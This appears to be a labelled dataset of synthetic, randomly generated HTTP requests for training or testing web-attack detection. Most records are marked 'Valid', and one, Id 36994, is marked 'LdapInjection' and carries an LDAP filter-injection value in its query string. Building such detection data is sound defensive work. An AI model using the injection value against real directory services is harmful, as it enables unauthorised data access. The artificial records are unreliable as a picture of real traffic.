If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 36
MIME-Version: 5.8
Pragma: rhl0rs='t'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bnBzMm90RTlhaTJ0dmhvaHJpZTE3OHJhaW5lbmVkYTBTYW90ZXdhbw==
Range: 864538-4,42725-309719
Referer: http://vn2rde.it/itewak/i0tba/eFEcih/dhdlee/dangdg.htm
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 1.4; Fe-aD; rv:2.2.4) Gecko/30629359
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: 7.5 104.55.46.185:5687, FTP/1.5 www.rwss.html:765, 6.1 76.19.39.244
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 763 5.20.25.117 "gmfte7ocbcLWwo" "Thu, 12 Jan 06 05:54:45 UTC"
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41704
Start - Id: 9061
class: Valid
GET /Sp5itdSelzy/n2dMVxo1/gNdttEecsbNoiht/mz6a/u9Z91UYBfPZ_J/aLTQ6xP509UsaR4JkqZ/efaxT_Jc78u/m9PPEdbfuANV4wkEZ8Pd/aoriortr.cgi?lid7aaf1L6q=eO3mai&ze=065900531&Sg=4681743&rinoonefPkbi=40&ere1tma=lhomee8waditinr4d&Nsaesoetofu9=078061&shatz=aHBxk&lAtabt=bn4i&MoY0z@Ht@p=vnw%7E+binc&ly44eevtNiTr=wgFf9&j5epSevalGxp_gWi5=59904&CNnynimskbnaB0r=913 HTTP/1.0
Host: www.aqhpsexreu.net:5
Connection: close
Accept: */*;q=0.5
Accept-Charset: ks_c_5601-1987;q=0.9, cp-950;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: nsuts-maTcat
Cache-Control: only-if-cached
Client-ip: 53.233.249.140
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="18"
Date: Wed, 15 Mar 06 20:32:19 UTC
ETag: "sS.c56WXGb47EKtK8"
Expect: MalraU
From: ueP9ir@rAnlhe.it
If-Modified-Since: Fri, 12 Dec 08 03:55:05 GMT
If-Unmodified-Since: Fri, 30 Jun 06 14:27:55 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Nov 08 12:08:05 GMT
Max-Forwards: 6
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: rneu expZ=5wizus
Authorization: Digest cnonce="it7a6vt"
Range: -9,-8753
Referer: http://www.40ed.cz/asteb.jsp
TE: trailers,gzip;q=0.6
Trailer: Connection
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 9.6; Li-6c; rv:7.1.5) Gecko/67324619
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1506x4944
Via: HTTP/9.9 167.226.123.231, FTP/8.1 103.171.109.191
Transfer-Encoding: deflate
Upgrade: Ektmi/4.4, l0dr/4.3, sifbE/1.7, ejpbmd/3.6
Warning: 025 www.lpv9b.shtml "tFr7n0ijdontAxhnO" 
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9061
Start - Id: 4154
class: Valid
POST /teh4dA/nTVhC3r/iqF5Kjd7B/asudgRis/xKwkK5s64oNYJ2s5S/daRlnITigLs5I/Pz8MtXG5metaYIsmPY/ulte/mkHojTvlZWA_AnpidcMZ.asmx? HTTP/1.1
Content-Length: 14
Content-Language: fc,n
Content-Encoding: deflate
Content-Location: http://www.lacAe.st/snvi/AdiesEsp/oaens.gz
Content-MD5: bzJ0bmJuZ2w2ZGxhbGUxdg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 May 07 24:56:58 GMT
Last-Modified: Mon, 24 May 04 22:44:21 GMT
Host: 196.106.33.58
Connection: keep-alive
Accept: image/*;q=0.9, video/*;q=0.9, video/quicktime
Accept-Charset: macintosh;q=0.3, ks_c_5601-1987, euc-cn;q=0.6
Accept-Encoding: compress, identity, gzip, compress
Accept-Language: bsmningj-wtaoose;q=0.5, nolumb-eoSue;q=0.3, iei-yoLc;q=0.0
Cache-Control: only-if-cached
Client-ip: 224.142.228.209
Cookie: sdehc1r=u7a;fabt0befsr=an y v$
Cookie2: $Version="7"
Date: Thu, 30 Sep 04 23:54:23 CET
ETag: W/"2C_Qw18CRg16zFmEoJ"
Expect: cads
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Thu, 15 Oct 09 22:18:36 CET
If-Unmodified-Since: Sat, 18 Nov 06 07:04:43 UTC
If-Match: *
If-None-Match: "NJ8E0ZsGA-eCy6ap"
If-Range: Sun, 23 May 04 02:50:34 UTC
Max-Forwards: 0535
MIME-Version: 5.0
Pragma: ed5rnne=1Smie
Proxy-Authorization: Digest nc=7DDA6ada
Authorization: 9Aoga fiYg=y4oest
Range: -9,-905
Referer: /hBOse/oto7I/9rniod/0nib0.jpeg
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: fuhstv6mle (bOh8@mDqS; lNwW2OU@YO; 1HIZvk)
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 872x878
Via: 4.4 250.140.201.221
Transfer-Encoding: 8dxl; 5dnNetcr=aiefuy
Upgrade: ahpr/8.4, iraUdd/9.2, cnc6/0.3
Warning: 964 157.74.94.185 "addaltysTi7tiham" 
X-Forwarded-For: 145.209.171.178
X-Serial-Number: 5833814723
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

berEhq=7500504

End - Id: 4154
Start - Id: 31541
class: Valid
GET /gs-Pi/iOnfqwQA9Poa/jtrIqvN-a4-zuJ/oMXRG4PZOwUFw/r1yedDneotooel/ip/9tsitrrx/iatl/GhYWLp/irtne8itbhunnld/eX5fjI0vnj06vT3paBb/ex.PDWw.jpeg?ey5n3ippseetye=sfzjRniDtphtie&motehs0iiMzr=7RtezN3sd&tbodyJE=position&objectpKY=51420&gywtntuId3ploh=neE&riwnsturns=in&edcWhu0s1era=+Ffn&Acl1RgaERbNro=oquGHFa&Gerchjnlufqitih=%3E%27h&ztiMS=rh8jp%29eeAstdintj&pthqsutTn=ibth&2LpZk38L=r7iframei&ixnmrergc=8322163955&ntb=eI%3Dopesibrn HTTP/1.0
Host: www.fwje.org
Connection: tsnoa1SQ
Accept: */*
Accept-Charset: koi8, iso-8859-1;q=0.6, macintosh, koi8
Accept-Encoding: *;q=0.3
Accept-Language: vtu-s5mt;q=0.2, hn-tlief
Cache-Control: no-transform
Client-ip: 84.244.242.42
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="53"
Date: Mon, 21 Jun 04 10:37:41 GMT
ETag: "AhwrREaLU@Il.S2"
Expect: 100-continue
From: hlyrn9n@fimlaeyny.st
If-Modified-Since: Sat, 07 Apr 07 22:35:36 GMT
If-Unmodified-Since: Sat, 20 Sep 08 24:52:18 UTC
If-Match: "grG7ADa7uXv0lBM3"
If-None-Match: "V4EP2oUXYDGXVTDr"
If-Range: "JIxieoPu0iG81ScuXulc"
Max-Forwards: 30
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic ZWVhVDpucnMw
Range: -2245
Referer: /Eeb5dt/is6atene.dll
TE: chunked
Trailer: Host
User-Agent: Mozilla/0.9 (Windows; U; WinNT 3.2; tc-s5; rv:7.2.6) Gecko/16863260
UA-CPU: x86
UA-Disp: 5662,024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 362x515
Via: aQi2/0.1 8.240.18.166, FTP/2.8 97.242.11.105, HTTP/5.0 170.32.215.35
Transfer-Encoding: compress
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 946 134.249.182.177:9568 "87neo" "Sat, 15 Jan 05 06:34:58 CET"
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 5515370509152
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31541
Start - Id: 5248
class: Valid
PUT /fZ2.4oAHJIY/l1WIPPgr2z/tRf/oietihhnmtmTMegpty/thush/h1rdgesfseu/IiQ/dthwtoxodelsea/nM5PR/AT3hZH2KUz7/avaa537yom.php? HTTP/1.1
Content-Length: 18
Content-Language: dhy3,Bfohi
Content-Encoding: gzip
Content-Location: /efsa.htm
Content-MD5: ZXNoZWU3c2FsYWlpN2hiMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Apr 06 12:42:55 UTC
Last-Modified: Sun, 27 Jun 04 09:16:27 CET
Host: 186.115.180.246:4
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=081
Client-ip: 78.163.7.145
Cookie: rsec=e]stiSenrupdatet
Cookie2: $Version="74"
Date: Fri, 27 Feb 04 16:15:52 CET
ETag: W/"VQJWXBbtX-vVHXeg"
Expect: 100-continue
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Sat, 24 Jun 06 06:07:42 UTC
If-Unmodified-Since: Tue, 26 May 09 13:24:23 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Jan 05 07:31:31 GMT
Max-Forwards: 9539
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM NDJhMjByZlVuaGFTdGN1YXcwbXRhYW44bkEyZ3dJb2h0bjNsZWVuTQ==
Authorization: NTLM ZG5tZWVvSG8zVGJuaHJ1bmVjaXJ0aGRpRXRubTNhb2RxcHNlejVhdHJhYWdlbg==
Range: 627-96060,029458-
Referer: http://rfmebuac.ch/noacn/Ddhab.pdf
TE: chunked
Trailer: Max-Forwards
User-Agent: hltOsD/8.0.8
UA-CPU: 68000
UA-Disp: 793,8160,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: FTP/3.0 136.183.51.127, HTTP/4.7 www.ltnutn.htm, HTTP/2.2 www.nnms.jpg
Transfer-Encoding: deflate
Upgrade: tMhm/1.0, C7euh/3.4
Warning: 526 www.cbflN.html "hsea" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

it=66&EwiIu-fC=ota

End - Id: 5248
Start - Id: 36994
class: LdapInjection
GET /cG/-6r2Vreplace4Xqw/TrrbeoesFHdaTtft/5document-Pggp643/tc.BPxKM1Gt_63l4zA/h@GLtDlvmq0BW8X7/tonksnqButlWVZB/npi/mSnh/sN5ol.tiff?hnagijtcescoe0=tsn3eauesHtu&Mw-JpsevaljXJ=uvg7iomhdiyleon7c5&ahh2c=alNptnsolSeeoE4t&ap0wis=Ytp4&ecae=8l%29%28%26%28objectClass+%3D++o4TS*%29&4yh40awnr1o3eh=28743&yaq=totet&fl9tsyWDnturee=3%25uinovt2do&y3wrimfcnt9sm=isreplacer2l%3Adm2nbgsound HTTP/1.1
Host: www.hmNs6ny.st:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.6, deflate, deflate;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=06201
Client-ip: 9.220.179.73
Cookie: eviYuylr5=054236;omiiee9dvn=sCxe
Cookie2: $Version="893"
Date: Tue, 12 May 09 11:46:44 CET
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Sun, 02 May 04 23:45:54 GMT
If-Unmodified-Since: Tue, 07 Feb 06 07:05:26 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 12
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: kRnrwd aue9huup=eencnnai
Range: 84-,-422477,1197-5319
Referer: /cEa1ecd/nneau.js
TE: trailers
Trailer: User-Agent
User-Agent: eM4mj0P4nV http://www.neh6thdn.be
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36994
Start - Id: 4785
class: Valid
POST /gpPH-40pdacP11HqIG4G/eMsCPXyEm.asp? HTTP/1.0
Content-Length: 251
Content-Language: gd8qbiei
Content-Encoding: identity
Content-Location: http://www.QlulsO.org/hdh5/biedOpn/eyclI.exe
Content-MD5: bGlleW9IYmIzOGFldGVIOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 05:16:50 CET
Last-Modified: Mon, 09 Apr 07 17:52:16 UTC
Host: www.gPrqn6ymRa.be
Connection: 5nsat
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 187.93.237.97
Cookie: acecmdnLzna=07868;nezboltCUltw=ht0;prae=orapsr+oet/cOstdin;udvCtEGnetcat_=56474831
Cookie2: $Version="9"
Date: Sun, 07 Mar 10 01:34:08 UTC
ETag: "xAn8A7w_qwd-Ao4RS@tB"
Expect: erePlwnn=tboel5n;75rtreh
From: 9mwiN@6woe1E.net
If-Modified-Since: Mon, 18 Feb 08 12:43:15 CET
If-Unmodified-Since: Sun, 02 Apr 06 09:50:30 CET
If-Match: *
If-None-Match: "XjejdQqNjI9Ai3m"
If-Range: "mjRhrpQ_vnNIzsrE5jS"
Max-Forwards: 478
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: wsrgco euerToht=tdrirs
Range: 1757-72,-28304,0-
Referer: http://www.sS1ct.org/eeoetd/vjte/terukm.mpg
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (X11; U; Unix 7.9; Qa-sb; rv:6.0.4) Gecko/87452952
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: 8.7 www.rcaca.jpg, 0.0 www.asyp.png, FTP/8.1 170.237.121.148
Transfer-Encoding: identity
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 865 www.coRthr.shtml "oCpstedTscbho" "Thu, 07 Dec 06 06:32:02 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oecchwo4o=94327590&a2=c>&AigYSs1PD=wp-eewtddi2n~ao4&nve0njvlg=FhOmeyE&ttDegwiro=ekg98&pOS0@jmBWQ=066302013&Esedg3aauAGe=7&rhuaemaen=>ebody< st/ss&jm&vpeno1t5wis5i=hgmw8tg&eaiiwr3oi=trZykMc&qxireplaceF0dxnystyle=7ebei9idatnet&etefaaqm=52754

End - Id: 4785
Start - Id: 29187
class: Valid
GET /tsc/tl8ewetgoaNosaayr/imgETVvR5z/pkueeadp3oi/em_xjbB-1PV/ia/wFNN/Cp5w1Adb/untatN1h0aiheUrI8obc.htm?ophwrahto=29039&oR9e17T=25&wo=cRei4ssTci7URat2gh&hnotoi=583&sdudr=s9t8pYZ3_e4&mh5ei=584288 HTTP/1.1
Host: www.nareto.org:4105
Connection: keep-alive
Accept: application/*;q=0.4, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 214.229.176.133
Cookie: xroAa9sl=NTnsek
Cookie2: $Version="44"
Date: Fri, 11 Feb 05 20:32:33 GMT
ETag: W/"m7yYCAjTfLrZUPWx"
Expect: ekht
From: 4otngeu@itoo.net
If-Modified-Since: Tue, 19 May 09 03:07:26 UTC
If-Unmodified-Since: Mon, 04 May 09 14:26:10 CET
If-Match: *
If-None-Match: "MK.wKC8a1TvrPyi"
If-Range: Sun, 12 Mar 06 11:32:53 UTC
Max-Forwards: 516
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nc=90f0EcDe
Authorization: Basic SGV0bXVnOmdycnloMG0=
Range: -4
Referer: /IattnHJl.png
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 8.3; is-hg; rv:8.2.0) Gecko/18549780
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 944x565
Via: 2.5 139.192.78.234, g3ngs/5.0 www.teh08osM.png, Noy/5.2 83.117.3.131
Transfer-Encoding: htvsne; tDqwoBrt=rtislii
Upgrade: itc/2.5
Warning: 168 www.escbxam.tiff "8trlaregto" "Sat, 10 Nov 07 11:09:25 UTC"
X-Forwarded-For: 44.32.231.105
X-Serial-Number: 4041973045614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29187
Start - Id: 14331
class: Valid
GET /c_gC47W0CmJ7/8teti/mcatiSkX.@vUimg3/nmGSIxySfcy_c/iNbzsbagtEueewzcuNq/tmCRK6--3.r/fKM.15OHU/eqvOMBp/SAzDp2CyY/isgMS@zhC9GI/hdE.IRt.htm?8o1esglunln7m=05&CVL20X6=Di1bnur7+&PpttyomaI8u=ohsrsqTodtl6Yhl&cceztefheemJoo6=7822330&Ecel=0&eSrt9iexoidhabt=994641&eaise=ne&eorin=toeechohddE%24replaceNo3fo%29includet&avnilhs8=te&dtddy=aj6T&wKBzCX.3ebgsoundQ=objectn8i&na=evaln97I+gs%5Ddxe&cfo=796591579 HTTP/1.0
Host: 211.58.172.206
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.2, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: oea-x;q=0.4
Cache-Control: only-if-cached
Client-ip: 62.65.141.139
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Wed, 28 Feb 07 10:53:34 CET
ETag: "Xrde-JvqITgQdSr_"
Expect: 100-continue
From: hRagoz@mdeso9.st
If-Modified-Since: Tue, 24 Mar 09 04:44:16 GMT
If-Unmodified-Since: Fri, 03 Apr 09 02:17:50 GMT
If-Match: "T-ezSXVsCRdimbL3GEx"
If-None-Match: *
If-Range: Mon, 24 Nov 08 16:04:12 UTC
Max-Forwards: 9071
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM dXRFY1NlYXJlc290b25lcmFmbWhvc3VicmF1dWxoc2VpaGllcndtaXNhYzA=
Authorization: Basic dG40YTkyaDphUGV3dG1p
Range: 44-41,-8,-787777
Referer: http://yv8Ajr.be/ptae2ye/itlKta.wav
TE: gzip,trailers
Trailer: From
User-Agent: otlira (acZ6Qt5m; aFyk7ErK5; imJuCla)
UA-CPU: MIPS
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 4.6 99.59.219.145
Transfer-Encoding: compress
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 152.19.185.106
X-Serial-Number: 04884664
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14331
Start - Id: 13661
class: Valid
GET /sv/7VCtmIF/between9ToptT9uu-52OgT/passwdukPcB/errpht/-sFDkcLJHHge/i-iOmhbICef/-inputreplace/yopen4jfrom.css?Xosamlstdinvlc0dS6=uiistid&te=a-lVi&dtmds=fu%5Dtagt&loOowthmO=479528370&fialy4n=t&taf7reoa=51021 HTTP/1.1
Host: 171.38.120.91:76
Connection: eerE
Accept: application/*;q=0.0, text/*;q=0.4, video/quicktime;q=0.5
Accept-Charset: euc-jp, cp-936;q=0.6
Accept-Encoding: gzip, compress, gzip, deflate;q=0.6
Accept-Language: *;q=0.9
Cache-Control: stwA='8s'
Client-ip: 148.192.91.169
Cookie: g4cNt=ldxFCKT
Cookie2: $Version="4"
Date: Sat, 24 Feb 07 18:07:51 UTC
ETag: W/"MtO3PnVDFCE@uWlpM"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Thu, 15 Sep 05 08:13:00 GMT
If-Unmodified-Since: Sun, 28 Jun 09 21:30:41 GMT
If-Match: "ivqQ9tUFp7CF8.tQxA_a"
If-None-Match: *
If-Range: *
Max-Forwards: 9928
MIME-Version: 9.6
Pragma: 6e='u'
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM aWFnbmV5bkloZWlocWUyZXNpaUpoMDZ1aWJlYXRsU2hlYw==
Range: 1-7
Referer: /glaltjo/tljTc/ouLrgheS/EdazB1/93ral.html
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 4.5; di-In; rv:1.4.7) Gecko/82919714
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: 2.6 www.Taiko1ee.html, 6.4 40.154.60.138:0
Transfer-Encoding: deflate
Upgrade: oiz/5.7, 4Whet/4.7, sdili/7.8
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 43.38.172.20
X-Serial-Number: 02500062912801761
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13661
Start - Id: 7278
class: Valid
PUT /auhltvaEcseociedeeyv/F0LcNyIh4m/dbD/le8ogkos/YYRqyKpur_9/rh/ze/nlo/ae/taafetht4ns.mspx? HTTP/1.1
Content-Length: 239
Content-Language: l,5ccaeqe,phep
Content-Encoding: compress
Content-Location: http://www.Aaasarsd.it/odendpr/huadrsqo/eotglsw/aeewoon.swf
Content-MD5: eGV0a3JpMXJpaHhmdjl5Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Dec 06 02:09:13 UTC
Last-Modified: Wed, 26 Jul 06 03:47:26 GMT
Host: www.iwriyee.gov:80
Connection: keep-alive
Accept: video/*, image/*, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 89.162.155.233
Cookie: n1h7hsirr=6;naalaruofn= or5%;6psvarxtermG=ln;pWJLUMV-Vm=437006
Cookie2: $Version="42"
Date: Tue, 04 Mar 08 24:10:57 CET
ETag: W/"a_P_.ceqKKH6kOr8J"
Expect: 100-continue
From: gm0jsa@ehox0yd.cz
If-Modified-Since: Thu, 08 Jun 06 01:05:28 UTC
If-Unmodified-Since: Wed, 22 Feb 06 09:52:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Feb 10 05:56:09 CET
Max-Forwards: 2
MIME-Version: 8.8
Pragma: a=d2jos
Proxy-Authorization: Basic aTJhZTptc3d5U25t
Authorization: Basic c3N3dHpzOm43OHhp
Range: -4
Referer: /lLo9tm/respvt/ksaonrit.mp3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.4 (compatible; MSIE 0.0; Win 9x; eodhhdt; eexAnhd)
UA-CPU: Sparc
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2345x2125
Via: 9.8 181.170.93.120
Transfer-Encoding: identity
Upgrade: rdt/2.6, bbnoh/3.2, 1lceaS/9.8
Warning: 698 244.139.81.158:9692 "qtcaagogrePei" "Fri, 21 Apr 06 21:05:03 CET"
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

pun-grb=siMc( &tst9trRfue=eevalS&wi=sticn&8rayWRrtet9soaE=Gwtrsddtvta6ca&eTxr=iaeconnect t8ne a\eKi&M-t4-7l=5274922&8sfKmNc=c2s]rsS&0eimo2lul=tnhRouytoer:o&ologOOtCAMxHPa=786&wpewzneomfeetj=809128&8iT6I0x0t=iNmtTantsr&8divand0=3973

End - Id: 7278
Start - Id: 4800
class: Valid
PUT /yrPQ5N@25t2m0/cnetiinlY/cfjX71Q/dhi8JqwJAIDIN/rwetaHoxon.php3? HTTP/1.0
Content-Length: 106
Content-Language: netCad4b
Content-Encoding: gzip
Content-Location: /ueieh.jsp
Content-MD5: bGh1T2N4Y3lwcm50ZXcyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Jun 09 14:15:23 CET
Last-Modified: Thu, 30 Nov 06 10:27:42 GMT
Host: 123.121.175.18:80
Connection: keep-alive
Accept: application/x-tar, text/xml;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tnliubk-fmw;q=0.2, ils-uv;q=0.1, hot-ahynaeme;q=0.6
Cache-Control: only-if-cached
Client-ip: 123.153.199.188
Cookie: saeelnhheis=16339;ne=aeeM1oeaiono;ds3tnoilcnee=ons1mJoBn2;w4r7gRn=8yOvIrbM;EezttemqerXEee=1161715;kbT7fP=hwrweet7
Cookie2: $Version="5"
Date: Mon, 20 Mar 06 17:09:54 GMT
ETag: "ov8k5Q.letHDD7S"
Expect: nDsoymdn=ottwwc;prAqoln=nes5zcIN
From: otAkg@xeDgx.gov
If-Modified-Since: Thu, 03 Jan 08 03:13:32 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:44:56 UTC
If-Match: *
If-None-Match: "0roB-egAlCXSQbAmYVW"
If-Range: *
Max-Forwards: 55
MIME-Version: 6.0
Pragma: KrhuEra4=Ewrmht
Proxy-Authorization: NTLM bnJoaWxvdGVlYWFtZHhhbnYzNHJoaDk0ZWdyaG8wb2VucmFzT3N0YUNyaA==
Authorization: Basic cnJPbGY3OnIzNG5vdTY=
Range: -302,2-7699
Referer: http://www.sij4.uk/eryWe0i/srAh.mp3
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 5.8; m6-ne; rv:7.5.6) Gecko/92638656
UA-CPU: x86
UA-Disp: 347,7890,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 904x222
Via: 6IUdn/7.7 www.pshs.shtml
Transfer-Encoding: identity
Upgrade: smg/9.8, n5os/4.7, tMiW/5.6
Warning: 794 www.tnqimul.jpg "ttktrlmtm" "Thu, 28 Jan 10 24:53:09 GMT"
X-Forwarded-For: 148.27.176.124
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

thyr=djYkFFbHz&94rlsuesp4Epeg=dltevhtfpwT&te4=o9&oosevan2vehi=9096&ol=280&oeurim=eilc4.ErS&3eecnl=ins3eb0U

End - Id: 4800
Start - Id: 16163
class: Valid
GET /cem8/pDpzLD/edemng6v/ix3LSDLUoR77F_Zn/dol7Oawtec.php3?es688g=97 HTTP/1.0
Host: www.ywdssJs.cz:80
Connection: sgihD
Accept: */*;q=0.1
Accept-Charset: iso-8859-4;q=0.8
Accept-Encoding: deflate;q=0.2, identity;q=0.4, deflate;q=0.1, identity;q=0.3
Accept-Language: t5eA-dgEeo5, gZse-sE0ie;q=0.3
Cache-Control: no-cache
Client-ip: 163.65.92.102
Cookie: smleuein=l ;trpeyA5asdd=nELfc;zsystembCu=i;terla=:+otilitjw n6e2d;Eea=allvar]e
Cookie2: $Version="737"
Date: Tue, 31 Aug 04 02:42:30 UTC
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 16 Mar 04 08:52:57 GMT
If-Match: "lloHo.M9gUOxnukUACA"
If-None-Match: *
If-Range: "f58y7ul1uVdgUuMO"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: hYn='euAgg'
Proxy-Authorization: Basic bWFsZ2VvbTpzR2huZG8=
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: http://www.phjf.gov/7Edse.cgi
TE: gzip;q=0.9,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.3 (Windows; U; WinNT 3.3; tl-wo; rv:9.4.4) Gecko/05564403
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 4.9 197.175.228.238
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 823993
----: ---------------
